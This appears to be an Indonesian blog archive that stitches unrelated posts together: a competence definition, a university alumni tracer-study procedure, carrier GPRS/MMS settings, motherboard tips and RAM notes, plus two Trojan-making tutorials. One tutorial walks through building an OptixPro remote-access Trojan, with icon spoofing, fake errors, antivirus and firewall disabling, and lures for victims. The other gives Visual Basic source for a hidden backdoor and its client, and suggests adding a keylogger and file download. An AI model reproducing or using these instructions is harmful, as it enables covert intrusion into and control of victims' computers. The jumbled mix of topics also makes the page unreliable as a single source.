Pengertian Kompentensi

Association K.U. Leuven mendefinisikan bahwa pengertian kompetensi adalah peingintegrasian dari pengetahuan, keterampilan, dan sikap yang memungkinkan untuk melaksanakan satu cara efektif.
Robert A. Roe (2001) mengemukakan definisi dari kompetensi yaitu:

Competence is defined as the ability to adequately perform a task, duty or role. Competence integrates knowledge, skills, personal values and attitudes. Competence builds on knowledge and skills and is acquired through work experience and learning by doing.

Dari definisi di atas kompetensi dapat digambarkan sebagai kemampuan untuk melaksanakan satu tugas, peran atau tugas, kemampuan mengintegrasikan pengetahuan, ketrampilan-ketrampilan, sikap-sikap dan nilai-nilai pribadi, dan kemampuan untuk membangun pengetahuan dan keterampilan yang didasarkan pada pengalaman dan pembelajaran yang dilakukan.

SOP Tracer Study Alumni FISIP



Manual Prosedur Studi Pelacakan (Tracer Study) Alumni
 
TUJUAN
  • Menggali informasi dari pada alumni mengenai perkembangan kompetensi yang dibutuhkan pasar kerja untuk bahan perbaikan kurikulum;
  • Menginventarisir manfaat yang diperoleh alumni selama menempuh pendidikan di Fakultas Ilmu Sosial dan Ilmu Politik Universitas Jenderal Soedirman;
  • Melakukan penelusuran tempat kerja, bidang kerja, waktu tunggu memperoleh pekerjaan, gaji pertama, pekerjaan sekarang dll dari alumni Fakultas Ilmu Sosial dan Ilmu Politik;
 
DEFINISI
  • Studi Pelacakan (Tracer Study) Alumni ialah penelusuran alumni untuk menggali informasi melalui pengisian kuesioner yang disusun   sedemikian   rupa   untuk   tujuan   perbaikan kurikulum dan proses pendidikan di Fakultas Ilmu Sosial dan Ilmu Politik.
  • Kuesioner   ialah   formulir   isian   yang   berisi pertanyaan-pertanyaan yang sudah disusun sedemikian rupa untuk suatu tujuan tertentu.
 
RUANG LINGKUP
Manual Prosedur Studi Pelacakan (Tracer Study) Alumni dijalankan melalui 2 mekanisme yaitu rutin (melalui   biaya   Fakultas yang dilaksanakan oleh Program Studi) dan insidental (melalui acara-acara yang diselenggarakan di Fakultas ISIP, Program Studi, maupun Ikatan alumni sendiri). Manual Prosedur Studi Pelacakan (Tracer Study) Alumni berlaku mulai turunnya informasi dari Fakultas ke Program Studi, Pembentukan tim Studi Pelacakan (Tracer Study) Alumni Fakultas dan Program Studi hingga penyerahan laporan Studi Pelacakan (Tracer Study) Alumni ke Fakultas. Manual Prosedur Studi Pelacakan (Tracer Study) Alumni ini dilakukan pada alumni Strata 1.
 
 
PIHAK TERKAIT
1.  Dekan
2.  Pembantu Dekan I
3.  Tim Studi Pelacakan (Tracer Study) Alumni Program Studi
4.  Bagian Administrasi Program Studi
 
 


BAGAN ALUR STUDI PELACAKAN ALUMNI
Pemberitahuan dari Fakultas
 
Fak. ISIP memberikan pemberitahuan kepada setiap Program studi melalui PD 1
 
 
Pembentukan Tim Studi Pelacakan
 
PD 1 membentuk tim studi pelacakan alumni di setiap program studi
 
 
Koordinasi Tim Studi Pelacakan
 
PD 1 melakukan kordinasi dengan tim studi pelacakan alumni  masing-masing program studi
 
 
Persiapan data daftar alumni
 
Bagian administrasi Program studi mempersiapkan data daftar alumni
 
 
Inventaris daftar kontak alumni
 
Bagian adm. Prog. Studi menginventarisir nomor kontak dan email sesuai data di adm. Prog. Studi.
 
 
Penentuan calon responden
 
Tim studi pelacakan alumni menentukan angkatan yang akan menjadi calon responden
 
 
Persiapan formulir kuesioner
 
Tim studi pelacakan mempersiapkan kuesioner studi pelacakan
 
 
 
Penggalian informasi ke alumni
 
Tim studi pelacakan melakukan penggalian informasi kepada responden
 
 
Kompilasi data
 
Tim studi pelacakan melakukan kompilasi data kuesioner
 
 
Penyusunan laporan akhir
 
Tim studi pelacakan menyusun laporan studi pelacakan dan diserahkan kepada ketua PD 1 dan PS.
 
 
Penyerahan Laporan
 
 
 
 
URAIAN PROSEDUR
  1. Fakultas ISIP memberikan pemberitahuan kepada setiap program studi melalui PD 1 untuk pelaksanaan studi pelacakan alumni;
  2. Surat pemberitahuan ditindaklanjuti oleh Pembantu dekan 1 dengan membentuk tim studi pelacakan alumni. Tim studi pelacakan ini terbentuk paling lambat 7 hari setelah penerimaan surat dari PD 1.
  3. Pembantu Dekan 1 melakukan koordinasi dengan seluruh anggota tim studi pelacakan untuk membicarakan rencana pelaksanaan kegiatan, pembagian tugas , dan kebutuhan. Pertemuan dilakukan paling lambat 7 hari setelah terbentuk tim studi pelacakan.
  4. Bagian administrasi program studi mempersiapkan data daftar alumni berdasarkan tahun lulus. Data diserahkan kepada tim studi pelacakan alumni paling lambat 7 hari setelah pertemuan;
  5. Bagian administrasi program studi menginventarisir nomor kontak dan email sesuai data di administrasi program studi paling lambat 7 hari sesudahnya.
  6. Tim studi pelacakan alumni menghimpun data-data yang sudah diperoleh dari bagian administrasi program studi unutk menentukan angkatan yang akan menjadi calon responden paling lambat 7 hari sesudahnya;
  7. Tim studi pelacakan mempersiapkan kuesioner (Lampiran form Studi Pelacakan Alumni). Tim studi pelacakan alumni menyebarkan form kuesioner kepada alumni berdasar no kontak dan email alumni yang telah didata oleh bagian administrasi program studi. Tim studi pelacakan alumni menerima kuesioner paling lambat 7 hari setelah tersusun daftar responden;
  8. Tim studi pelacakan melakukan penggalian informasi kepada responden (Lampiran form Studi Pelacakan Alumni) seperti yang tercantum di kuesioner kepada alumni. Penggalian informasi dilakukan antara tiga (3) sampai enam (6) bulan baik langsung ke kantor alumni, E-mail ataupun melalui telepon/HP.
  9. Tim studi pelacakan alumni menyusun data-data yang sudah diperoleh dan memasukkannnya ke dalam database di komputer. Tim studi palacakan alumni mengumpulkan kuesioner yang telah diisi paling lambat 7 hari setelah kuesioner terisi;
  10. Tim studi pelacakan melakukan kompilasi data-data dan menyusun laporan akhir hasil studi palacakan paling lambat  7 hari setelah semua data masuk;
  11. Tim studi pelacakan menyusun laporan studi pelacakan dan diserahkan kepada ketua PD 1 dan Program Studi;
  12. Tim studi pelacakan alumni melakukan versifikasi laporan studi pelacakan alumni. Verifikasi meliputi kelengkapan data-data isian kuesioner. Apabila ada perbaikan, tim studi pelacakan melakukan perbaikan paling lama 5 hari setelah laporan dikembalian. Tim studi pelacakan alumni menyerahkan laporan hasil pelaksanaan studi pelacakan alumni kepada PD 1.
  13. Prosedur layanan studi pelacakan alumni selesai.

Tutorial Cara Membuat Trojan Menggunakan OptixPro - How To Make Trojan Using Optix Pro !


Pada postingan saya kali ini akan membahas tutorial membuat trojan dengan menggunakan OptixPro. Saya memilih menggunakan Optix Pro karena software trojan maker ini memiliki beberapa fitur yang menarik dan kestabilan yang cukup bagus. Untuk softwarenya sudah saya sediakan di postingan saya sebelumnya Download OptixPro. Check this out!


Pertama-tama kita harus memulai dengan menciptakan program server yang bisa sobat beri nama dan beri icon apa saja. Untuk itu, jalankan program builder.exe yang disertakan pada file download OptixPro.
Setelah program builder dijalankan, perhatikan bagian General Information yang berada pada kelompok Main Settings di gambar bawah ini.
Bagian General Information ini bisa dikatakan bagian terpenting karena sobat menentukan Server Port yang secara default adalah 3410 ke port manapun yang sobat suka. Sobat bisa merubah port ini antara angka 1024-65535 sehingga trojan sobat lebih susah untuk terdeteksi oleh pemburu trojan yang mencari port-port tertentu yang dibuka.
Sobat juga dapat menentukan password (Server Password) yaitu password yang harus dimasukkan oleh client ketika melakukan koneksi agar bisa mengontrol bagian server. Kalo sobat tidak memasukkan password disini, ada kemungkinan komputer yang telah sobat susupi ini nantinya malah akan dikontrol oleh orang lain yang mempunyai program client trojan ini (pemburu trojan).
Bagian penting terakhir adalah pilihan Fake Error. Pilihan ini berhubungan erat dengan bagian Server Icon yang sangat berguna untuk menipu korban agar menjalankan bagian server trojan yang sobat buat (gambar dibawah). Sebagai contohnya, sobat dapat membuat trojan dengan icon bergambar Microsoft Paint dan menentukan pesan Fake Error dengan "File Error".
Cara ini sangat efektif kalo sobat ingin mengirimkan file bagian server ini ke korban dan membiarkan mereka mengira file tersebut adalah gambar, Ms Paint. Cara ini efektif karena secara default, Windows Explorer tidak menampilkan file ekstensi yang telah diketahui.

Selanjutnya perhatikan bagian Startup & Installation pada gambar dibawah ini.
Bagian ini digunakan untuk menentukan cara yang akan digunakan agar program server trojan ini dijalankan secara otomatis di komputer korban setiap kali komputer korban dihidupkan. Pada bagian File Setup, sobat menentukan nama file trojan ketika sudah dijalankan di dalam komputer korban. Biasanya nama file yang digunakan adalah nama file yang mirip dengan file system windows agar tidak mencurigakan seperti printer.exe, system32.exe, dsb. Pada saat dilihat melalui Windows Task Manager (Ctrl+Alt+Del) di Windows, nama file inilah yang akan terlihat.

Pada bagian Notifications adalah bagian yang digunakan untuk menentukan jenis pemberitahuan yang akan diterima oleh sang hacker ketika korban sedang online. Beberapa jenis pemberitahuan yang tersedia adalah ICQ, IRC, SMTP (email), dsb.
Informasi yang akan diberikan kepada sang hacker ketika korban online adalah informasi yang telah ditentukan pada setting di General Information dalam kolom Notification String Info seperti alamat IP, Password, Versi Windows, Port Trojan, dsb.
Jadi andai sobat mengaktifkan notifikasi ICQ, maka ketika korban menghidupkan komputernya dan terkoneksi ke internet, ICQ sobat akan segera mendapatkan pesan yang berisi informasi tentang korban tersebut.

Bagian Firewall & AVS Evasion adalah bagian setting yang menarik karena memungkinkan server trojan mematikan antivirus maupun firewall yang terinstall di komputer korban. Tujuannya jelas, agar trojan ini tidak diketahui atau dihalangi oleh antivirus maupun firewall. Langkah ini akan efektif ketika server trojan telah terinstall terlebih dahulu, kemudian korban baru melakukan instalasi antivirus atau firewall. Tapi perlu diingat, fitur semacam ini tidak akan abadi dikarenakan selalu berkembangnya antivirus dan trojan.

Nah, segala setting telah selesai, kini tekan tombol Build/Create Server untuk menciptakan file server trojan yang telah siap digunakan. Beri nama file trojan tersebut kemudian save. Para hacker biasanya menggunakan nama file yang menarik perhatian untuk dijalankan misalnya porno.exe, kamasutra.exe, rahasia.exe, dll.

Setting dan pembuatan server trojan sudah selesai dilakukan. File yang terbentuk ini juga sudah siap dijalankan oleh komputer korban, maka sobat bisa segera mengontrolnya secara penuh. Sobat bisa menjadi "setan" dengan membuka CD-rom, mematikan komputer, melihat apa yang dikerjakan, serta segala kegiatan illegal lainnya.
Sobat tentunya harus melakukan itu semua dengan pasangan server trojan ini, yaitu program client yang disertakan dalam file download OptixPro.
Menggunakan client trojan ini sangat mudah, sobat tinggal memasukkan alamat IP dari komputer korban, kemudian port yang telah sobat tentukan sebelumnya beserta password, dan mengklik tombol connect.
Setelah terkoneksi, sobat bisa melakukan berbagai kegiatan yang bisa membuat korban migrain gak ketulungan seperti membunyikan speaker, menghilangkan tombol mouse, dsb.

Selamat mencoba! :D

A simple trojan tutorial Vb


Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.



Server


The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using


CODE C Language
1Private Sub Form_Load()
2     Me.Visible = False
3End Sub


This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

CODE C Language
1Private Sub Form_Load()
2     Me.Visible = False
3     App.TaskVisible = False
4End Sub


(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though :D )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.


CODE C Language
1Private Sub Form_Load()
2     Me.Visible = False
3     App.TaskVisible = False
4     win.LocalPort = 2999
5     win.RemotePort = 455
6     win.Listen
7End Sub


This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.    


Then we add this code to our main form:

CODE C Language
1Private Sub win_ConnectionRequest(ByVal requestID As Long)
2     win.Close
3     win.Accept requestID
4End Sub
5
6Private Sub win_DataArrival(ByVal bytesTotal As Long)
7    win.GetData GotDat
8    DoActions (GotDat)
9End Sub



We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

CODE C Language
01Public Function DoActions(x As String)
02
03Select Case x
04        Case "msgbox"
05             Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
06
07        Case "shutdown"
08             shell "shutdown -s -f -t 00"
09End Select
10End Function


Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

CODE C Language
01                   
02Private Sub Form_Load()
03     Me.Visible = False
04     App.TaskVisible = False
05     win.LocalPort = 2999
06     win.RemotePort = 455
07     win.Listen
08End Sub
09
10Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
11     win.Close
12     win.Accept requestID
13End Sub
14
15Private Sub win_DataArrival(ByVal bytesTotal As Long)
16     win.GetData GotDat
17     DoActions (GotDat)
18End Sub


Remember to add your winsock control and name it to win if you use this code.



Module

CODE C Language
01Public Function DoActions(x As String)
02
03Select Case x
04        Case "msgbox"
05             Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
06
07        Case "shutdown"
08             shell "shutdown -s -f -t 00"
09End Select
10End Function


That’s all there is to the server side or Trojan part of it. Now on to the Client.


Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown,  and cmdDisconnect. Now lets look at the code we would use to make our
Client.

CODE C Language
01Private Sub cmdConnect_Click()
02     IpAddy = txtIp.Text
03     Win.Close
04     Win.RemotePort = 2999
05     Win.RemoteHost = IpAddy
06     Win.LocalPort = 9999
07     Win.Connect
08     cmdConnect.Enabled = False
09End Sub
10
11Private Sub cmdDisconnect_Click()
12     Win.Close
13     cmdConnect.Enabled = True
14End Sub
15            
16Private Sub cmdMsgbox_Click()
17     Win.SendData "msgbox"
18End Sub
19
20Private Sub cmdShutdown_Click()
21     Win.SendData "shutdown"
22End Sub


That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handeling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination.  :D

I have made the Batch Trojan!!!!

Setting GPRS dan MMS


MATRIX
Setting OTA:
Kirim SMS ke888 dengan pesan :
ACT[spasi]GPRS
MENTARI
Setting OTA via SMS ;
Kirim SMS ke3000 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP
Setting Manual :
GPRS
Profile Name : INDOSATGPRS
Homepage URL : http://wap.klub-mentari.com
IP Address : 10.19.19.19
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatgprs
MMS
Profile Name : INDOSATGPRS
Homepage URL : http://mmsc.indosat.com
IP Address : 10.19.19.19:8080
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatmms
IM3
Setting OTA via SMS ;
Kirim SMS ke3939 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP
Setting Manual :
GPRS

Connection name : M3-GPRS
Access point name : www.indosat-m3.net
User name : gprs
Password : im3
Authentication : Normal
Homepage : http://wap.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)
MMS
Connection name : M3-MMS
Access point name : indosatmms
User name : indosatmms
Password : indosatmms
Authentication : Normal
Homepage : http://mmsc.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)
TELKOMSEL
KARTU HALLO
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS
KARTU SIMPATI/KARTU AS
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS[spasi]angka dibelakang simcard Anda (Nomor ICCID/Integrated Circuit Card Identification)
Kemudian tunggu beberapa saat, Anda akan mendapat SMS konfirmasi bahwa aplikasi GPRS sedang diproses. Waktu yang dibutuhkan sekitar 48 jam. Setelah GPRS aktif, Anda akan mendapat notifikasi SMS lagi yang menyatakan GPRS sudah aktif.
Setting Manual :
GPRS

Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8000
MMS
Connection Name: tel-MMS
Data Bearer: GPRS
Access Point Name: mms
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Proxy address: 10.1.89.150
Homepage: http://mms.telkomsel.com/
Connection Security: Off
XL
Setting OTA via SMS ;
Ketik SMS dengan isi : GPRS[spasi][spasi] Kirim ke 9667
Ketik SMS dengan isi : MMS[spasi][spasi] Kirin ke 9667
Setting Manual :
GPRS
Connection Name: XL-GPRS
Data Bearer: GPRS
Access Point Name: www.xlgprs.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://wap.lifeinhand.com
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080
MMS
Connection Name: XL-MMS
Data Bearer: GPRS
Access Point Name: www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://mmc.xl.net.id/servlets/mms
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080
3 (THREE)
Setting Manual :
GPRS

Settings’ Name: 3-GPRS
Homepage : http://wap.three.co.id/
Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs
MMS
Settings’ name : 3-MMS
Homepage : http://mms.hutch.co.id/
GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No
KARTU AXIS
Parameter Umum GPRS
Connection Name : AXIS
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXIS
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage : http://wap.axisworld.co.id
Connection Security : Off
Session Mode : Permanent
Parameter Umum MMS
Connection Name : AXISmms
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXISmms
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage / MMS Server : http://mmsc.AXIS
Connection Security : Off
Session Mode : Permanent

Semoga bisa membantu. . .

Tips Memilih Motherboard


Motherboard merupakan salah satu bagian terpenting dalam sebuah komputer, karena motherboard akan menentukan jenis processor dan memory yang akan kita pakai. Dan yang harus dilihat pertama kali dari sebuah motherboard adalah tipe chipset yg dipakai. Chipset pada motherboard memiliki batasannya sendiri2, misalnya kec max processor yg bisa dipakai, jmlh RAM yg bisa ditampung, tambahan video card onboard, dll. Kadang kalameski ada 2 motherboard berchipset sama, tapi fitur dan performa yang ditawarkan berbeda. Itulah kenapa kita harus benar spesifikasi motherboard.
Berikutnya adalah jangan cari motherboard yang mendukung processor paling cepat (kecuali dana tidak menjadi masalah). Cari motherboard yg mendukung satu tingkat dibawahnya, karena performanya tidak jauh berbeda. Cari juga motherboard yg mendukung memory tercepat, karena jika ada keinginan menambah memory maka memory yg lebih cepat akan mudah di cari.
Selanjutnya, jika kita terpaksa memilih motherboard yg memiliki video card onboard karena keterbatasan dana, ada baiknyacari motherboard yg disertai dgn slot expansi video card. Jadi, seandainya ingin melakukan upgrade video card, sudah tersedia sarananya sehingga tidak usah membeli motherboard baru.
Terakhir adalah cari motherboard yg sudah menyertakan fitur tambahan seperti RAID, LAN, USB 2.0, dan Fire Wire. Kecuali Fire Wire, semua fitur tambahan tsb sudah banyak terdapat pada motherboard keluaran terbarumeski itu kelas budget. 


Perbedaan RAM dan ROM

PENGERTIAN RAM
Kata “memory” digunakan untuk mendiskripsikan suatu sirkuit elektronik yang mampu untuk menampung data dan juga instruksi program. Memory dapat dibayangkan sebagai suatu ruang kerja bagi komputer dan memory juga menentukan terhadap ukuran dan jumlah program yang bisa dijalankan dalam waktu yang sama, sekaligus juga jumlah data yang bisa diproses. Memory terkadang disebut sebagai primary storage, primary memory, main storage, main memory, internal storage atau juga random access memory (RAM). Ada empat macam tipe dari memory komputer, yaitu:
1. random access memory
2. read only memory
3. CMOS memory
4. virtual memory
Memori berfungsi menyimpan sistim aplikasi, sistem pengendalian, dan data yang sedang beroperasi atau diolah. Semakin besar kapasitas memori akan meningkatkan kemapuan komputer tersebut. Memori diukur dengan KB atau MB.
Random Access Memory (RAM), merupakan bagian memory yang bisa digunakan oleh para pemakai untuk menyimpan program dan data. Kebanyakan dari RAM disebut sebagai barang yang volatile. Artinya adalah jika daya listrik dicabut dari komputer dan komputer tersebu mati, maka semua konten yang ada di dalam RAM akan segera hilang secara permanen. Karena RAM bersifat temporer dan volatile, maka orang menciptakan suatu media penyimpanan lain yang sifatnya permanen. Ini biasanya disebut sebagai secondary storage. Secondary storage bersifat tahan lama dan juga tidak volatile, ini berarti semua data atau program yang tersimpan di dalamnya bisa tetap ada walaupun daya atau listrik dimatikan. Beberapa contoh dari secondary storage ini misalnya adalah magnetic tape, hardisk, magnetic disk dan juga optical disk.
JENIS-JENIS RAM
Berdasarkan cara kerja:
1. Dynamic RAM (DRAM)
* Fast Page Mode DRAM (FPM DRAM)
* Extended Data Output DRAM (EDO DRAM)
* Synchronous DRAM (SDRAM)
* Rambus DRAM (RDRAM)
* Double Data Rate SDRAM (DDR SDRAM)
* Untuk video :
1. Video RAM (VRAM)
2. Windows RAM (WRAM)
3. Synchronous Graphic RAM (SGRAM)
2. Static RAM (SRAM)
Berdasarkan Module:
1. Single Inline Memory Module (SIMM), Mempunyai kapasitas 30 atau 72 pin. Memori SIMM 30 pin untuk kegunaan PC zaman 80286 sehingga 80486 dan beroperasi pada 16 bit. Memory 72 pin banyak digunakan untuk PC berasaskan Pentium dan beroperasi pada 32 bit. Kecepatan dirujuk mengikuti istilah ns (nano second) seperti 80ns, 70ns, 60ns dan sebagainya. Semakin kecil nilainya maka kecepatan lebih tinggi. DRAM (dynamic RAM) dan EDO RAM (extended data-out RAM) menggunakan SIMM. DRAM menyimpan bit di dalam suatu sel penyimpanan (storage sell) sebagai suatu nilai elektrik (electrical charge) yang harus di-refesh beratus-ratus kali setiap saat untuk menetapkan (retain) data. EDO RAM sejenis DRAM lebih cepat, EDO memakan waktu dalam output data, dimana ia memakan waktu di antara CPU dan RAM. Memori jenis ini tidak lagi digunakan pada komputer akhir-akhir ini.
2. Double Inline Memory Module (DIMM), Berkapasitas 168 pin, kedua belah modul memori ini aktif, setiap permukaan adalah 84 pin. Ini berbeda daripada SIMM yang hanya berfungsi pada sebelah modul saja. Menyokong 64 bit penghantaran data. SDRAM (synchronous DRAM) menggunakan DIMM. Merupakan penganti dari DRAM, FPM (fast page memory) dan EDO. SDRAM pengatur (synchronizes) memori supaya sama dengan CPU clock untuk pemindahan data yang lebih cepat. dan terdapat dalam dua kecepatan iaitu 100MHz (PC100) dan 133MHz (PC133).
3. RIMM (Rambus), Dulu dikenali sebagai RDRAM. Adalah sejenis SDRAM yang dibuat oleh Rambus. DRDRAM digunakan untuk CPU dari Intel yang berkecepatan tinggi. Pemindahan data sama seperti DDR SDRAM tetapi mempunyai dua saluran data untuk meningkatkan kemampuan. Juga dikenali sebagai PC800 yang kerkelajuan 400MHz. Beroperasi dalam bentuk 16 bit bukan 64 bit. Pada saat ini terdapat DRDRAM berkecepatan 1066MHz yang dikenal dengan RIMM (Rambus inline memory module). DRDRAM model RIMM 4200 32-bit menghantar 4.2gb setiap saat pada kecepatan 1066MHZ.
Berdasarkan jumlah pin: 30 pin, 72 pin, 168 pin
Berdasarkan kecepatannya (nanosecond)
Terdapat beberapa jenis RAM yang beredar dipasaran hingga saat ini yaitu :
1. FPM DRAM (Fast Page Mode Random Access Memory), RAM yang paling pertama kali ditancapkan pada slot memori 30 pin mainboard komputer, dimana RAM ini dapat kita temui pada komputer type 286 dan 386. Memori jenis ini sudah tidak lagi diproduksi.
2. EDO RAM ( Extended Data Out Random Access Memory), RAM jenis ini memiliki kemampuan yang lebih cepat dalam membaca dan mentransfer data dibandingkan dengan RAM biasa. Slot memori untuk EDO – RAM adalah 72 pin. Bentuk EDO-RAM lebih panjang daripada RAM yaitu bentuk Single Inline Memory Modul (SIMM). Memiliki kecepatan lebih dari 66 Mhz
3. BEDO RAM (Burst EDO RAM), RAM yang merupakan pengembangan dari EDO RAM yang memiliki kecepatan lebih dari 66 MHz.
4. SD RAM (Synchronous Dynamic Random Access Memory), RAM jenis ini memiliki kemampuan setingkat di atas EDO-RAM. Slot memori untuk SD RAM adalah 168 pin. Bentuk SD RAM adalah Dual Inline Memory Modul (DIMM). Memiliki kecepatan di atas 100 MHz.
5. RD RAM (Rambus Dynamic Random Access Memory). RAM jenis ini memiliki kecepatan sangat tinggi, pertama kali digunakan untuk komputer dengan prosesor Pentium 4. Slot Memori untuk RD RAM adalah 184 pin. Bentuk RD RAM adalah Rate Inline Memory Modul (RIMM). Memiliki kecepatan hingga 800 MHz.
6. DDR SDRAM (Double Data Rate Synchronous Dynamic RAM). RAM jenis ini memiliki kecepatan sangat tinggi dengan menggandakan kecepatan SD RAM, dan merupakan RAM yang banyak beredar saat ini. RAM jenis ini mengkonsumsi sedikit power listrik. Slot Memori untuk DDR SDRAM adalah 184 pin, bentuknya adalah RIMM.
RAM terdiri dari sekumpulan chip. Chip-chip ini mampu untuk menampung:
* data untuk diproses;
* instruksi atau program, untuk memproses data;
* data yang telah diproses dan menunggu untuk dikirim ke output device, secondary storage atau juga communication device;
* instruksi sistem operasi yang mengontrol fungsi-fungsi dasar dari sistem komputer
Semua data dan program yang dimasukkan lewat alat input akan disimpan terlebih dahulu di main memory, khususnya di RAM yang merupakan memori yang dapat dimasup (di akses), artinya daapt diisi dan diambil isinya oleh programmer.
Struktur dari RAM dibagi menjadi 4 bagian, yaitu:
1. Input storage, digunakan untuk menampung input yang dimasukkan lewat alat input
2. Program storage, dipakai untuk menyimpan semua instruksi-instruksi program yang akan di proses
3. Working storage, digunakan untuk menyimpan data yang akan diolah dan hasil dari pengolahan
4. Output storage, digunakan untuk menampung hasil akhir dari pengolahan data yang akan ditampilkan ke alat output
Input yang dimasukkan lewat alat input, pertama kali ditampung terlebih dahulu di input storage, bila input tersebut berbentuk program, maka dipindahkan ke program storage dan bila berbentik data, akan dipindahkan ke working storage. Hasil dari pengolahan juga ditampung di working storage dan hasil yang akan ditampilkan ke alat output dipindahkan ke output storage.
RAM mempunyai kemampuan untuk melakukan pengecekan dari data yang disimpannya, yang disebut dengan istilah parity check. Bila data hilang atau rusak, dapat diketahui dari sebuah bit tambahan yang disebut dengan parity bit atau check bit. Untuk mengerti kapasitas dari RAM, maka beberapa terminologi berikut ini sering digunakan.
* Bit, yaitu suatu sistem penomoran biner yang mewakili unit terkecil dari data dalam suatu sistem komputer. Suatu bit hanya terdiri dari dua buah angka yaitu 1 dan 0. Di dalam komputer, sebuah 0 berarti suatu sinyal elektronik atau magnetis adalah tiada atau absen, sementara 1 berarti sebaliknya.
* Byte, yaitu suatu grup dari delapan bit. Sebuah byte mewakili satu karakter, satu digit atau satu nilai. Kapasitas dari memory komputer, atau RAM, dinyatakan di dalam bytes atau sekumpulan dari bytes.
Misalnya 1 byte memory di RAM terdiri dari 8 bit, sebagai parity bit digunakan sebuah bit tambahan, sehingga menjadi 9 bit.
Ada dua macam cara yang dilakukan oleh parity check, yaitu pengecekan pariti genap (even parity check) dan pengecekan pariti ganjil (odd parity check). Even parity check menunjukkan jumlah bit 1 untuk tiap-tiap bit dalam 1 byte beserta pariti bit harus berjumlah genap (even), kalau berjumlah ganjil berarti ada kerusakan data. Misalnya karakter ”C” dalam sistem ASCII 8 bit berbentuk:
Dengan cara even parity check, pada waktu data ini direkam, parity bit diisi bit 1 supaya jumlah bit 1 bernilai genap, sebagai berikut:
Pada waktu data tersebut diambil untuk dipergunakan, maka akan dilakukan pengecekan terhadapm bit-bitnya. Kalau ada kerusakan bit, misalnya salah satu bit terganti dari bit 1 menjadi bit 0 atau dari bit 0 menjadi bit 1, maka jumlah bit 1 dalam 1 byte tersebut tidak akan berjumlah genap dan akan terdeteksi oleh CPU.
Odd parity check menunjukkan jumlah bit 1 untuk tiap-tiap bit dalam 1 byte beserta parity bit harus berjumlah ganjil (odd), kalau berjumlah genap berarti ada kerusakan data. Misalnya karakter ”C” dalam sistem kode ASCII 8 bit tersebut dengan cara odd parity check seharusnya terekam sebagai berikut:
Kalau jumlah bit 1 dalam 1 byte tersebut tidak berjumlah ganjil, berarti ada kesalahan data.
PERBEDAAN RAM dan ROM
